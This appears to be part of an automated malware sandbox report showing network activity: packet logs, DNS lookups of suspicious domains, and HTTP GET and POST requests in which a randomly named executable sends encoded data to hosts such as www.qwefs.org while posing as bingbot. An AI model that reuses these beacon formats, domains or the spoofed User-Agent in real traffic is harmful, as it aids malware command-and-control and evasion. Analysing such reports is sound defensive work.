                            Sep 26, 2024 15:24:54.893845081 CEST4971480192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:54.894587994 CEST8049714161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:54.894655943 CEST4971480192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:55.749422073 CEST4971480192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:56.767898083 CEST4971580192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:56.772859097 CEST8049715161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:56.772979021 CEST4971580192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:56.783531904 CEST4971580192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:56.788625956 CEST8049715161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:57.387134075 CEST8049715161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:57.387217045 CEST8049715161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:57.387296915 CEST4971580192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:57.387712955 CEST8049715161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:57.387779951 CEST4971580192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:58.296222925 CEST4971580192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:59.314846039 CEST4971680192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:59.319659948 CEST8049716161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:59.322032928 CEST4971680192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:59.332489014 CEST4971680192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:59.337317944 CEST8049716161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:59.337570906 CEST8049716161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:59.948558092 CEST8049716161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:59.948581934 CEST8049716161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:59.948671103 CEST4971680192.168.2.7161.97.168.245
                            Sep 26, 2024 15:25:00.033627987 CEST8049716161.97.168.245192.168.2.7
                            Sep 26, 2024 15:25:00.033787966 CEST4971680192.168.2.7161.97.168.245
                            Sep 26, 2024 15:25:00.843496084 CEST4971680192.168.2.7161.97.168.245
                            Sep 26, 2024 15:25:01.864175081 CEST4971780192.168.2.7161.97.168.245
                            Sep 26, 2024 15:25:01.869262934 CEST8049717161.97.168.245192.168.2.7
                            Sep 26, 2024 15:25:01.876972914 CEST4971780192.168.2.7161.97.168.245
                            Sep 26, 2024 15:25:01.880167007 CEST4971780192.168.2.7161.97.168.245
                            Sep 26, 2024 15:25:01.885222912 CEST8049717161.97.168.245192.168.2.7
                            Sep 26, 2024 15:25:02.494323969 CEST8049717161.97.168.245192.168.2.7
                            Sep 26, 2024 15:25:02.494355917 CEST8049717161.97.168.245192.168.2.7
                            Sep 26, 2024 15:25:02.494369984 CEST8049717161.97.168.245192.168.2.7
                            Sep 26, 2024 15:25:02.494386911 CEST8049717161.97.168.245192.168.2.7
                            Sep 26, 2024 15:25:02.498127937 CEST4971780192.168.2.7161.97.168.245
                            Sep 26, 2024 15:25:02.499319077 CEST4971780192.168.2.7161.97.168.245
                            Sep 26, 2024 15:25:02.504106998 CEST8049717161.97.168.245192.168.2.7
                            Sep 26, 2024 15:25:08.569792032 CEST4971880192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:08.574852943 CEST8049718208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:08.574975967 CEST4971880192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:08.586146116 CEST4971880192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:08.590940952 CEST8049718208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:09.093723059 CEST8049718208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:09.093785048 CEST4971880192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:10.098177910 CEST4971880192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:10.103485107 CEST8049718208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:11.113581896 CEST4971980192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:11.118741989 CEST8049719208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:11.118837118 CEST4971980192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:11.131480932 CEST4971980192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:11.136414051 CEST8049719208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:11.663456917 CEST8049719208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:11.663635969 CEST4971980192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:12.640049934 CEST4971980192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:12.645128965 CEST8049719208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:13.676460981 CEST4972080192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:13.682018042 CEST8049720208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:13.682104111 CEST4972080192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:13.708141088 CEST4972080192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:13.712985039 CEST8049720208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:13.713068008 CEST8049720208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:14.204571009 CEST8049720208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:14.204706907 CEST4972080192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:15.218307972 CEST4972080192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:15.223256111 CEST8049720208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:16.239814043 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:16.244760990 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:16.244863987 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:16.256067038 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:16.261104107 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.532761097 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.532783031 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.532808065 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.532824039 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.532922983 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.532942057 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.532958984 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.532974005 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.532989025 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.533006907 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.533023119 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.533083916 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.533083916 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.539412975 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.539500952 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.542315960 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.619529963 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619555950 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619574070 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619924068 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619947910 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619963884 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.619978905 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620104074 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620119095 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620134115 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620136023 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.620176077 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.620277882 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.620722055 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620738029 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620754004 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620846033 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.620868921 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.620883942 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621282101 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.621646881 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621665001 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621680975 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621716976 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.621727943 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.621727943 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.621733904 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.622400999 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.622457027 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.622632980 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.622724056 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.625173092 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.625204086 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.625221014 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.625308037 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.706592083 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706671000 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706707954 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706742048 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706779003 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706831932 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706851006 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.706870079 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706902981 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706937075 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.706964016 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.706969023 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707000017 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707000017 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707004070 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707045078 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707077980 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707110882 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707149029 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707176924 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707461119 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707518101 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707570076 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707597971 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707603931 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707638979 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707674026 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707703114 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707715988 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707750082 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707783937 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707812071 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.707817078 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707854986 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.707933903 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.708326101 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708383083 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708415985 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708467960 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708496094 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.708499908 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708534956 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708569050 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708591938 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.708604097 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708642006 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708673954 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708703995 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.708708048 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708971024 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.709321976 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709357023 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709389925 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709415913 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.709534883 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709568977 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709608078 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709639072 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.710269928 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.713596106 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.718960047 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:56.086170912 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:56.091100931 CEST8049722162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:56.091195107 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:56.109569073 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:56.114604950 CEST8049722162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:56.710685015 CEST8049722162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:56.710710049 CEST8049722162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:56.710777998 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:57.624547958 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:58.644197941 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:58.649899006 CEST8049723162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:58.649971008 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:58.664242029 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:58.669177055 CEST8049723162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:59.236140013 CEST8049723162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:59.236231089 CEST8049723162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:59.236371994 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:00.172422886 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:01.317977905 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:01.323024988 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.328234911 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:01.336790085 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:01.341762066 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.342034101 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.993768930 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.994129896 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.994177103 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:02.843806028 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:04.273736000 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:04.278820038 CEST8049725162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:04.278904915 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:04.526388884 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:04.531466007 CEST8049725162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:05.119072914 CEST8049725162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:05.119168043 CEST8049725162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:05.119241953 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:05.122823000 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:05.127666950 CEST8049725162.0.238.43192.168.2.7

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 26, 2024 15:24:02.854707956 CEST5880853192.168.2.71.1.1.1
                            Sep 26, 2024 15:24:02.969937086 CEST53588081.1.1.1192.168.2.7
                            Sep 26, 2024 15:24:18.830842972 CEST5764553192.168.2.71.1.1.1
                            Sep 26, 2024 15:24:19.186707973 CEST53576451.1.1.1192.168.2.7
                            Sep 26, 2024 15:24:32.830862045 CEST6366253192.168.2.71.1.1.1
                            Sep 26, 2024 15:24:32.882055044 CEST53636621.1.1.1192.168.2.7
                            Sep 26, 2024 15:24:46.013672113 CEST6421253192.168.2.71.1.1.1
                            Sep 26, 2024 15:24:46.024106026 CEST53642121.1.1.1192.168.2.7
                            Sep 26, 2024 15:24:54.154818058 CEST5268853192.168.2.71.1.1.1
                            Sep 26, 2024 15:24:54.207243919 CEST53526881.1.1.1192.168.2.7
                            Sep 26, 2024 15:25:07.503412008 CEST5574953192.168.2.71.1.1.1
                            Sep 26, 2024 15:25:08.515096903 CEST5574953192.168.2.71.1.1.1
                            Sep 26, 2024 15:25:08.558958054 CEST53557491.1.1.1192.168.2.7
                            Sep 26, 2024 15:25:08.562875986 CEST53557491.1.1.1192.168.2.7
                            Sep 26, 2024 15:25:55.802151918 CEST5010753192.168.2.71.1.1.1
                            Sep 26, 2024 15:25:56.081095934 CEST53501071.1.1.1192.168.2.7

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Sep 26, 2024 15:24:02.854707956 CEST192.168.2.71.1.1.10x6f24Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                            Sep 26, 2024 15:24:18.830842972 CEST192.168.2.71.1.1.10x1f94Standard query (0)www.qwefs.orgA (IP address)IN (0x0001)false
                            Sep 26, 2024 15:24:32.830862045 CEST192.168.2.71.1.1.10x912bStandard query (0)www.dfmagazine.shopA (IP address)IN (0x0001)false
                            Sep 26, 2024 15:24:46.013672113 CEST192.168.2.71.1.1.10xc58Standard query (0)www.mktimediato.onlineA (IP address)IN (0x0001)false
                            Sep 26, 2024 15:24:54.154818058 CEST192.168.2.71.1.1.10xf648Standard query (0)www.disn-china.buzzA (IP address)IN (0x0001)false
                            Sep 26, 2024 15:25:07.503412008 CEST192.168.2.71.1.1.10xdb3bStandard query (0)www.kevin-torkelson.infoA (IP address)IN (0x0001)false
                            Sep 26, 2024 15:25:08.515096903 CEST192.168.2.71.1.1.10xdb3bStandard query (0)www.kevin-torkelson.infoA (IP address)IN (0x0001)false
                            Sep 26, 2024 15:25:55.802151918 CEST192.168.2.71.1.1.10xfaa7Standard query (0)www.mandemj.topA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Sep 26, 2024 15:24:02.969937086 CEST1.1.1.1192.168.2.70x6f24No error (0)www.trapkitten.website195.161.68.8A (IP address)IN (0x0001)false
                            Sep 26, 2024 15:24:19.186707973 CEST1.1.1.1192.168.2.70x1f94No error (0)www.qwefs.org45.114.171.236A (IP address)IN (0x0001)false
                            Sep 26, 2024 15:24:32.882055044 CEST1.1.1.1192.168.2.70x912bNo error (0)www.dfmagazine.shopdfmagazine.shopCNAME (Canonical name)IN (0x0001)false
                            Sep 26, 2024 15:24:32.882055044 CEST1.1.1.1192.168.2.70x912bNo error (0)dfmagazine.shop84.32.84.32A (IP address)IN (0x0001)false
                            Sep 26, 2024 15:24:46.024106026 CEST1.1.1.1192.168.2.70xc58Name error (3)www.mktimediato.onlinenonenoneA (IP address)IN (0x0001)false
                            Sep 26, 2024 15:24:54.207243919 CEST1.1.1.1192.168.2.70xf648No error (0)www.disn-china.buzz161.97.168.245A (IP address)IN (0x0001)false
                            Sep 26, 2024 15:25:08.558958054 CEST1.1.1.1192.168.2.70xdb3bNo error (0)www.kevin-torkelson.info208.91.197.27A (IP address)IN (0x0001)false
                            Sep 26, 2024 15:25:08.562875986 CEST1.1.1.1192.168.2.70xdb3bNo error (0)www.kevin-torkelson.info208.91.197.27A (IP address)IN (0x0001)false
                            Sep 26, 2024 15:25:56.081095934 CEST1.1.1.1192.168.2.70xfaa7No error (0)www.mandemj.top162.0.238.43A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • www.trapkitten.website
                            • www.qwefs.org
                            • www.dfmagazine.shop
                            • www.disn-china.buzz
                            • www.kevin-torkelson.info
                            • www.mandemj.top

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749704195.161.68.8806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:02.991679907 CEST359OUTGET /vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqg HTTP/1.1
                            Host: www.trapkitten.website
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:24:03.749346972 CEST778INHTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:24:03 GMT
                            Content-Type: text/html
                            Content-Length: 634
                            Connection: close
                            Server: Apache
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.74970645.114.171.236806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:19.204349041 CEST608OUTPOST /toq1/ HTTP/1.1
                            Host: www.qwefs.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.qwefs.org
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.qwefs.org/toq1/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 6a 48 70 6e 4e 31 66 4b 76 6d 69 46 39 45 45 53 6a 46 5a 6e 7a 70 35 36 41 68 65 4c 71 61 59 69 53 54 76 66 37 51 47 31 53 6a 5a 7a 68 74 6c 53 62 30 63 4c 7a 45 47 6e 67 64 53 30 6e 72 65 4d 69 36 48 6a 78 34 36 36 4f 6b 6c 52 62 54 6e 69 67 33 6d 68 52 57 79 7a 72 70 79 35 44 74 42 41 6d 53 5a 70 68 6e 63 6c 75 38 4a 6e 79 6e 61 78 45 44 7a 43 43 34 38 35 4a 54 2b 6f 4b 58 78 41 37 6d 77 53 74 69 4d 31 69 41 38 39 51 6f 62 62 34 4d 55 6d 54 62 6c 45 4f 2f 47 47 52 78 4c 71 61 65 4f 6f 4d 30 76 6f 43 74 4a 65 65 6f 31 38 6f 45 30 78 73 75 7a 58 58 30 65 79 71 35 70 65 37 34 42 6c 33 58 32 43 2f 6c 52 55 49 71 62 57 2f 51 3d 3d
                            Data Ascii: Z0=jHpnN1fKvmiF9EESjFZnzp56AheLqaYiSTvf7QG1SjZzhtlSb0cLzEGngdS0nreMi6Hjx466OklRbTnig3mhRWyzrpy5DtBAmSZphnclu8JnynaxEDzCC485JT+oKXxA7mwStiM1iA89Qobb4MUmTblEO/GGRxLqaeOoM0voCtJeeo18oE0xsuzXX0eyq5pe74Bl3X2C/lRUIqbW/Q==
                            Sep 26, 2024 15:24:20.048789024 CEST289INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:09 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
